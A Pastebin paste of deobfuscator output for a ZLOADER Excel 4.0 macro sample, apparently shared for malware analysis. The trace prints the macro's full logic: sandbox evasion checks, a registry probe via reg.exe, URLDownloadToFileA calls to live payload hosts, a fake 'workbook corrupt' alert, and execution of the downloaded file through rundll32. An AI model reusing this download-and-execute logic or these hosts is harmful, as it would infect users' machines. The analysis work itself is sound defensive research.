API tools faq
paste
dissectmalware

Deobfuscation of ZLOADER XLM macro

dissectmalware
May 20th, 2020
555
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 16.01 KB | None | 0 0
raw download clone embed print report
  1. Deobfuscated by: https://github.com/DissectMalware/XLMMacroDeobfuscator
  2. sample: https://app.any.run/tasks/b5ef8297-5a4d-46dd-9e01-89e4999cdb6e/
  3. sample ref: https://twitter.com/reecdeep/status/1263145785119707136
  4.  
  5. [Loading Cells]
  6. auto_open: auto_open->Sheet2!$GV$18838
  7. [Starting Deobfuscation]
  8. CELL:GV18838 , FullEvaluation ,SET.VALUE(Sheet2!AW38694,"-39")
  9. CELL:GV18839 , FullEvaluation ,GOTO(HJ43843)
  10. CELL:HJ43843 , FullEvaluation ,SET.VALUE(Sheet2!HB21318,"19")
  11. CELL:HJ43844 , FullEvaluation ,RUN(Sheet2!EE50653)
  12. CELL:EE50653 , FullEvaluation ,SET.VALUE(Sheet2!HQ33119,"-118")
  13. CELL:EE50654 , FullEvaluation ,GOTO(HB65366)
  14. CELL:HB65366 , FullEvaluation ,SET.VALUE(Sheet2!GI30540,"38")
  15. CELL:HB65367 , FullEvaluation ,RUN(Sheet2!IB44586)
  16. CELL:IB44586 , FullEvaluation ,SET.VALUE(Sheet2!AO25178,"-888.8")
  17. CELL:IB44587 , FullEvaluation ,RUN(Sheet2!AM3080)
  18. CELL:AM3080 , FullEvaluation ,SET.VALUE(Sheet2!DM7968,"163")
  19. CELL:AM3081 , FullEvaluation ,GOTO(GZ7209)
  20. CELL:GZ7209 , FullEvaluation ,SET.VALUE(Sheet2!CS62471,"162")
  21. CELL:GZ7210 , FullEvaluation ,RUN(Sheet2!HS55235)
  22. CELL:HS55235 , FullEvaluation ,SET.VALUE(Sheet2!HK38885,"-115")
  23. CELL:HS55236 , FullEvaluation ,RUN(Sheet2!HR16144)
  24. CELL:HR16144 , FullEvaluation ,SET.VALUE(Sheet2!FV62574,"434")
  25. CELL:HR16145 , FullEvaluation ,RUN(Sheet2!A64064)
  26. CELL:A64064 , FullEvaluation ,SET.VALUE(Sheet2!V36648,"250")
  27. CELL:A64065 , FullEvaluation ,GOTO(DW5659)
  28. CELL:DW5659 , FullEvaluation ,FORMULA("=CLOSE(FALSE)",Sheet2!BY37267)
  29. CELL:DW5660 , FullEvaluation ,RUN(Sheet2!HS39528)
  30. CELL:HS39528 , FullEvaluation ,FORMULA("=APP.MAXIMIZE()",Sheet2!HS39529)
  31. CELL:HS39529 , NotImplemented ,APP.MAXIMIZE()
  32. CELL:HS39530 , FullEvaluation ,RUN(Sheet2!GC13846)
  33. CELL:GC13846 , FullEvaluation ,FORMULA("=IF(GET.WINDOW(7),GOTO(R[23420]C[-108]),)",Sheet2!GC13847)
  34. CELL:GC13847 , FullEvaluation ,IF(GET.WINDOW(7),GOTO(R[23420]C[-108]),)
  35. CELL:GC13848 , FullEvaluation , RUN(Sheet2!IH62193)
  36. CELL:IH62193 , FullEvaluation , FORMULA("=IF(GET.WINDOW(20),,GOTO(R[-24927]C[-165]))",Sheet2!IH62194)
  37. CELL:IH62194 , FullEvaluation , IF(GET.WINDOW(20),,GOTO(R[-24927]C[-165]))
  38. CELL:IH62195 , FullEvaluation , RUN(Sheet2!HS14490)
  39. CELL:HS14490 , FullEvaluation , FORMULA("=IF(GET.WINDOW(23)<3,GOTO(R[22776]C[-150]),)",Sheet2!HS14491)
  40. CELL:HS14491 , FullEvaluation , IF(GET.WINDOW(23)<3,GOTO(R[22776]C[-150]),)
  41. CELL:HS14492 , FullEvaluation , RUN(Sheet2!IR14879)
  42. CELL:IR14879 , FullEvaluation , FORMULA("=IF(GET.WORKSPACE(31),GOTO(R[22387]C[-175]),)",Sheet2!IR14880)
  43. CELL:IR14880 , FullEvaluation , IF(GET.WORKSPACE(31),GOTO(R[22387]C[-175]),)
  44. CELL:IR14881 , FullEvaluation , RUN(Sheet2!BV65087)
  45. CELL:BV65087 , FullEvaluation , FORMULA("=IF(GET.WORKSPACE(13)<770,GOTO(R[-27821]C[3]),)",Sheet2!BV65088)
  46. CELL:BV65088 , FullBranching , IF(GET.WORKSPACE(13)<770,GOTO(R[-27821]C[3]),)
  47. CELL:BV65088 , FullEvaluation , [TRUE] GOTO(R[-27821]C[3])
  48. CELL:BY37267 , End , CLOSE(FALSE)
  49. CELL:BV65088 , FullEvaluation , [FALSE]
  50. CELL:BV65089 , FullEvaluation , RUN(Sheet2!I45396)
  51. CELL:I45396 , FullEvaluation , FORMULA("=IF(GET.WORKSPACE(14)<390,GOTO(R[-8130]C[68]),)",Sheet2!I45397)
  52. CELL:I45397 , FullBranching , IF(GET.WORKSPACE(14)<390,GOTO(R[-8130]C[68]),)
  53. CELL:I45397 , FullEvaluation , [TRUE] GOTO(R[-8130]C[68])
  54. CELL:BY37267 , End , CLOSE(FALSE)
  55. CELL:I45397 , FullEvaluation , [FALSE]
  56. CELL:I45398 , FullEvaluation , GOTO(N29331)
  57. CELL:N29331 , FullEvaluation , FORMULA("=IF(GET.WORKSPACE(19),,GOTO(R[7935]C[63]))",Sheet2!N29332)
  58. CELL:N29332 , FullEvaluation , IF(GET.WORKSPACE(19),,GOTO(R[7935]C[63]))
  59. CELL:N29333 , FullEvaluation , RUN(Sheet2!DK27988)
  60. CELL:DK27988 , FullEvaluation , FORMULA("=IF(GET.WORKSPACE(42),,GOTO(R[9278]C[-38]))",Sheet2!DK27989)
  61. CELL:DK27989 , FullEvaluation , IF(GET.WORKSPACE(42),,GOTO(R[9278]C[-38]))
  62. CELL:DK27990 , FullEvaluation , RUN(Sheet2!E4390)
  63. CELL:E4390 , FullEvaluation , FORMULA("=IF(ISNUMBER(SEARCH(""Windows"",GET.WORKSPACE(1))),,GOTO(R[32876]C[72]))",Sheet2!E4391)
  64. CELL:E4391 , FullEvaluation , IF(ISNUMBER(SEARCH("Windows",GET.WORKSPACE(1))),,GOTO(R[32876]C[72]))
  65. CELL:E4392 , FullEvaluation , GOTO(M44930)
  66. CELL:M44930 , FullEvaluation , FORMULA("=""EXPORT HKCU\Software\Microsoft\Office\""",Sheet2!HV21820)
  67. CELL:M44931 , FullEvaluation , GOTO(CR48643)
  68. CELL:CR48643 , FullEvaluation , FORMULA("=""C:\Users\Public\nSy0P.reg""",Sheet2!HZ40705)
  69. CELL:CR48644 , FullEvaluation , GOTO(HV51866)
  70. CELL:HV51866 , FullEvaluation , FORMULA("=R[3762]C[-1]&GET.WORKSPACE(2)&""\Excel\Security ""&R[22647]C[3]&"" /y""",Sheet2!HW18058)
  71. CELL:HV51867 , FullEvaluation , GOTO(FM56636)
  72. CELL:FM56636 , FullEvaluation , FORMULA("=""C:\Windows\system32\reg.exe""",Sheet2!ET24206)
  73. CELL:FM56637 , FullEvaluation , GOTO(BE53453)
  74. CELL:BE53453 , FullEvaluation , FORMULA("=CALL(""Shell32"",""ShellExecuteA"",""JJCCCJJ"",0,""open"",R[-29248]C[93],R[-35396]C[174],0,5)",Sheet2!BE53454)
  75. CELL:BE53454 , NotImplemented , CALL("Shell32","ShellExecuteA","JJCCCJJ",0,"open","C:\Windows\system32\reg.exe",BD57216GET.WORKSPACE(2)\Excel\Security BH76101 /y,0,5)
  76. CELL:BE53455 , FullEvaluation , RUN(Sheet2!FA60753)
  77. CELL:FA60753 , FullEvaluation , FORMULA("=WHILE(ISERROR(FILES(R[-20051]C[77])))",Sheet2!FA60756)
  78. CELL:FA60754 , FullEvaluation , FORMULA("=WAIT(NOW()+""00:00:01"")",Sheet2!FA60757)
  79. CELL:FA60755 , FullEvaluation , FORMULA("=NEXT()",Sheet2!FA60758)
  80. CELL:FA60756 , PartialEvaluation , WHILE("C:\Users\Public\nSy0P.reg")
  81. CELL:FA60757 , PartialEvaluation , WAIT(NOW()+"00:00:01")
  82. CELL:FA60758 , PartialEvaluation , NEXT()
  83. CELL:FA60759 , FullEvaluation , GOTO(DO43860)
  84. CELL:DO43860 , FullEvaluation , FORMULA("=FOPEN(R[-3156]C[115])",Sheet2!DO43861)
  85. CELL:DO43861 , PartialEvaluation , FOPEN("C:\Users\Public\nSy0P.reg")
  86. CELL:DO43862 , FullEvaluation , GOTO(HE5978)
  87. CELL:HE5978 , FullEvaluation , FORMULA("=FPOS(R[37882]C[-94],215)",Sheet2!HE5979)
  88. CELL:HE5979 , PartialEvaluation , FPOS("""C:\Users\Public\nSy0P.reg""",215)
  89. CELL:HE5980 , FullEvaluation , RUN(Sheet2!HN27507)
  90. CELL:HN27507 , FullEvaluation , FORMULA("=FREAD(R[16353]C[-103],255)",Sheet2!HN27508)
  91. CELL:HN27508 , PartialEvaluation , FREAD("""C:\Users\Public\nSy0P.reg""",255)
  92. CELL:HN27509 , FullEvaluation , RUN(Sheet2!HD24312)
  93. CELL:HD24312 , FullEvaluation , FORMULA("=FCLOSE(R[19548]C[-93])",Sheet2!HD24313)
  94. CELL:HD24313 , PartialEvaluation , FCLOSE("""C:\Users\Public\nSy0P.reg""")
  95. CELL:HD24314 , FullEvaluation , GOTO(F14533)
  96. CELL:F14533 , FullEvaluation , FORMULA("=FILE.DELETE(R[26171]C[228])",Sheet2!F14534)
  97. CELL:F14534 , NotImplemented , FILE.DELETE(R[26171]C[228])
  98. CELL:F14535 , FullEvaluation , RUN(Sheet2!GP55286)
  99. CELL:GP55286 , FullEvaluation , FORMULA("=IF(ISNUMBER(SEARCH(""0001"",R[-27779]C[24])),GOTO(R[-18020]C[-121]),)",Sheet2!GP55287)
  100. CELL:GP55287 , FullEvaluation , IF(ISNUMBER(SEARCH("0001",R[-27779]C[24])),GOTO(R[-18020]C[-121]),)
  101. CELL:GP55288 , FullEvaluation , GOTO(BL55760)
  102. CELL:BL55760 , FullEvaluation , FORMULA("=""C:\Users\Public\C44zPD.html""",Sheet2!X34640)
  103. CELL:BL55761 , FullEvaluation , RUN(Sheet2!D53822)
  104. CELL:D53822 , FullEvaluation , FORMULA("=""https://docs.microsoft.com/en-us/officeupdates/office-msi-non-security-updates""",Sheet2!DP30771)
  105. CELL:D53823 , FullEvaluation , RUN(Sheet2!EP30832)
  106. CELL:EP30832 , FullEvaluation , FORMULA("=CALL(""urlmon"",""URLDownloadToFileA"",""JJCCJJ"",0,R[-62]C[-26],R[3807]C[-122],0,0)",Sheet2!EP30833)
  107. CELL:EP30833 , FullEvaluation , CALL("urlmon","URLDownloadToFileA","JJCCJJ",0,"https://docs.microsoft.com/en-us/officeupdates/office-msi-non-security-updates","C:\Users\Public\C44zPD.html",0,0)
  108. CELL:EP30834 , FullEvaluation , GOTO(HO40398)
  109. CELL:HO40398 , FullEvaluation , FORMULA("=FILES(R[-5759]C[-199])",Sheet2!HO40399)
  110. CELL:HO40399 , PartialEvaluation , FILES("C:\Users\Public\C44zPD.html")
  111. CELL:HO40400 , FullEvaluation , GOTO(AD45249)
  112. CELL:AD45249 , FullEvaluation , FORMULA("=IF(ISERROR(R[-4851]C[193]),GOTO(R[-7983]C[47]),)",Sheet2!AD45250)
  113. CELL:AD45250 , FullBranching , IF(ISERROR(R[-4851]C[193]),GOTO(R[-7983]C[47]),)
  114. CELL:AD45250 , FullEvaluation , [TRUE] GOTO(R[-7983]C[47])
  115. CELL:BY37267 , End , CLOSE(FALSE)
  116. CELL:AD45250 , FullEvaluation , [FALSE]
  117. CELL:AD45251 , FullEvaluation , GOTO(H25154)
  118. CELL:H25154 , FullEvaluation , SET.VALUE(Sheet2!FQ30497,"167")
  119. CELL:H25155 , FullEvaluation , RUN(Sheet2!FJ54370)
  120. CELL:FJ54370 , FullEvaluation , SET.VALUE(Sheet2!GQ23117,"112")
  121. CELL:FJ54371 , FullEvaluation , GOTO(E43845)
  122. CELL:E43845 , FullEvaluation , SET.VALUE(Sheet2!BF9812,"-421")
  123. CELL:E43846 , FullEvaluation , RUN(Sheet2!EV4466)
  124. CELL:EV4466 , FullEvaluation , SET.VALUE(Sheet2!GH41243,"275")
  125. CELL:EV4467 , FullEvaluation , GOTO(HC59670)
  126. CELL:HC59670 , FullEvaluation , SET.VALUE(Sheet2!DP53696,"44")
  127. CELL:HC59671 , FullEvaluation , GOTO(HU50919)
  128. CELL:HU50919 , FullEvaluation , SET.VALUE(Sheet2!Y3396,"-499")
  129. CELL:HU50920 , FullEvaluation , GOTO(BU42078)
  130. CELL:BU42078 , FullEvaluation , SET.VALUE(Sheet2!AE6901,"417")
  131. CELL:BU42079 , FullEvaluation , GOTO(BU33894)
  132. CELL:BU33894 , FullEvaluation , SET.VALUE(Sheet2!FB46077,"-495")
  133. CELL:BU33895 , FullEvaluation , GOTO(EC7952)
  134. CELL:EC7952 , FullEvaluation , SET.VALUE(Sheet2!FZ33527,"-179")
  135. CELL:EC7953 , FullEvaluation , GOTO(DA25067)
  136. CELL:DA25067 , FullEvaluation , SET.VALUE(Sheet2!IN320,"-489")
  137. CELL:DA25068 , FullEvaluation , GOTO(GF6215)
  138. CELL:GF6215 , FullEvaluation , FORMULA("=""C:\Users\Public\SN5uF.html""",Sheet2!AG54847)
  139. CELL:GF6216 , FullEvaluation , RUN(Sheet2!BE39499)
  140. CELL:BE39499 , FullEvaluation , FORMULA("=""https://arunruntuchattcar.tk/56hgfbcx.php""",Sheet2!H52699)
  141. CELL:BE39500 , FullEvaluation , GOTO(N31781)
  142. CELL:N31781 , FullEvaluation , FORMULA("=CALL(""urlmon"",""URLDownloadToFileA"",""JJCCJJ"",0,R[52591]C[-135],R[54739]C[-110],0,0)",Sheet2!EM108)
  143. CELL:N31782 , FullEvaluation , GOTO(HQ393)
  144. CELL:HQ393 , FullEvaluation , FORMULA("=FILES(R[25754]C[-174])",Sheet2!GY29093)
  145. CELL:HQ394 , FullEvaluation , RUN(Sheet2!AG4385)
  146. CELL:AG4385 , FullEvaluation , FORMULA("=IF(ISERROR(R[5875]C[83]),,RUN(R[-31]C[21]))",Sheet2!DT23218)
  147. CELL:AG4386 , FullEvaluation , RUN(Sheet2!BZ8150)
  148. CELL:BZ8150 , FullEvaluation , FORMULA("=""https://krisithcomdebe.tk/56hgfbcx.php""",Sheet2!ED29365)
  149. CELL:BZ8151 , FullEvaluation , GOTO(HA28272)
  150. CELL:HA28272 , FullEvaluation , FORMULA("=CALL(""urlmon"",""URLDownloadToFileA"",""JJCCJJ"",0,R[-32699]C[-116],R[-7217]C[-217],0,0)",Sheet2!IP62064)
  151. CELL:HA28273 , FullEvaluation , RUN(Sheet2!DS62361)
  152. CELL:DS62361 , FullEvaluation , FORMULA("=""The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.""",Sheet2!BL52177)
  153. CELL:DS62362 , FullEvaluation , GOTO(AH30663)
  154. CELL:AH30663 , FullEvaluation , FORMULA("=ALERT(R[28990]C[-81])",Sheet2!EO23187)
  155. CELL:AH30664 , FullEvaluation , RUN(Sheet2!DG5222)
  156. CELL:DG5222 , FullEvaluation , FORMULA("=""C:\Windows\system32\rundll32.exe""",Sheet2!BI22211)
  157. CELL:DG5223 , FullEvaluation , GOTO(AL34640)
  158. CELL:AL34640 , FullEvaluation , FORMULA("=R[51958]C[-193]&"",DllRegisterServer""",Sheet2!HR2889)
  159. CELL:AL34641 , FullEvaluation , RUN(Sheet2!HP13960)
  160. CELL:HP13960 , FullEvaluation , FORMULA("=CALL(""Shell32"",""ShellExecuteA"",""JJCCCJJ"",0,""open"",R[-7044]C[-156],R[-26366]C[9],0,5)",Sheet2!HI29255)
  161. CELL:HP13961 , FullEvaluation , GOTO(EM108)
  162. CELL:EM108 , FullEvaluation , CALL("urlmon","URLDownloadToFileA","JJCCJJ",0,"https://arunruntuchattcar.tk/56hgfbcx.php","C:\Users\Public\SN5uF.html",0,0)
  163. CELL:EM109 , FullEvaluation , GOTO(GY29093)
  164. CELL:GY29093 , PartialEvaluation , FILES("C:\Users\Public\SN5uF.html")
  165. CELL:GY29094 , FullEvaluation , RUN(Sheet2!DT23218)
  166. CELL:DT23218 , FullBranching , IF(ISERROR(R[5875]C[83]),,RUN(R[-31]C[21]))
  167. CELL:DT23218 , FullEvaluation , [TRUE]
  168. CELL:DT23219 , FullEvaluation , GOTO(ED29365)
  169. CELL:ED29365 , FullEvaluation , "https://krisithcomdebe.tk/56hgfbcx.php"
  170. CELL:ED29366 , FullEvaluation , RUN(Sheet2!IP62064)
  171. CELL:IP62064 , FullEvaluation , CALL("urlmon","URLDownloadToFileA","JJCCJJ",0,"""https://krisithcomdebe.tk/56hgfbcx.php""","C:\Users\Public\SN5uF.html",0,0)
  172. CELL:IP62065 , FullEvaluation , RUN(Sheet2!BL52177)
  173. CELL:BL52177 , FullEvaluation , "The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt."
  174. CELL:BL52178 , FullEvaluation , RUN(Sheet2!EO23187)
  175. CELL:EO23187 , PartialEvaluation , ALERT("""The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.""")
  176. CELL:EO23188 , FullEvaluation , RUN(Sheet2!BI22211)
  177. CELL:BI22211 , FullEvaluation , "C:\Windows\system32\rundll32.exe"
  178. CELL:BI22212 , FullEvaluation , GOTO(HR2889)
  179. CELL:HR2889 , FullEvaluation , C:\Users\Public\SN5uF.html,DllRegisterServer
  180. CELL:HR2890 , FullEvaluation , GOTO(HI29255)
  181. CELL:HI29255 , FullEvaluation , CALL("Shell32","ShellExecuteA","JJCCCJJ",0,"open","""C:\Windows\system32\rundll32.exe""","C:\Users\Public\SN5uF.html,DllRegisterServer",0,5)
  182. CELL:HI29256 , FullEvaluation , GOTO(BY37267)
  183. CELL:BY37267 , End , CLOSE(FALSE)
  184. CELL:DT23218 , FullEvaluation , [FALSE] RUN(Sheet2!EO23187)
  185. CELL:EO23187 , PartialEvaluation , ALERT("The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.")
  186. CELL:EO23188 , FullEvaluation , RUN(Sheet2!BI22211)
  187. CELL:BI22211 , FullEvaluation , "C:\Windows\system32\rundll32.exe"
  188. CELL:BI22212 , FullEvaluation , GOTO(HR2889)
  189. CELL:HR2889 , FullEvaluation , C:\Users\Public\SN5uF.html,DllRegisterServer
  190. CELL:HR2890 , FullEvaluation , GOTO(HI29255)
  191. CELL:HI29255 , FullEvaluation , CALL("Shell32","ShellExecuteA","JJCCCJJ",0,"open","""C:\Windows\system32\rundll32.exe""","C:\Users\Public\SN5uF.html,DllRegisterServer",0,5)
  192. CELL:HI29256 , FullEvaluation , GOTO(BY37267)
  193. CELL:BY37267 , End , CLOSE(FALSE)
  194. time elapsed: 5.366301536560059
Add Comment
Please, Sign In to add comment
Public Pastes
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!